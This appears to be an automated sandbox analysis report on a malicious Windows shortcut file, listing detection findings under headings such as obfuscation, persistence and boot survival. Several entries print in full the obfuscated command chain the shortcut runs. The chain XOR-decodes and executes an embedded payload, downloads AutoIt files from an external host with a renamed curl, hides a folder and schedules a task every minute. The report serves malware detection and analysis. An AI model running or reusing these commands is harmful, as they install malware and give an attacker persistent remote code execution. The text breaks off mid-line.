Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;

Contains functionality to dynamically determine API calls

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

PE file contains sections with non-standard names

Source: GSlLzFnTov.exe.1.dr

Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00007FF7C13D0566 push esi; retf

3_2_00007FF7C13D0567

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Drops PE files

Source: C:\Windows\System32\cmd.exe

File created: C:\GSlLzFnTov\GSlLzFnTov.exe

Jump to dropped file

Boot Survival

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 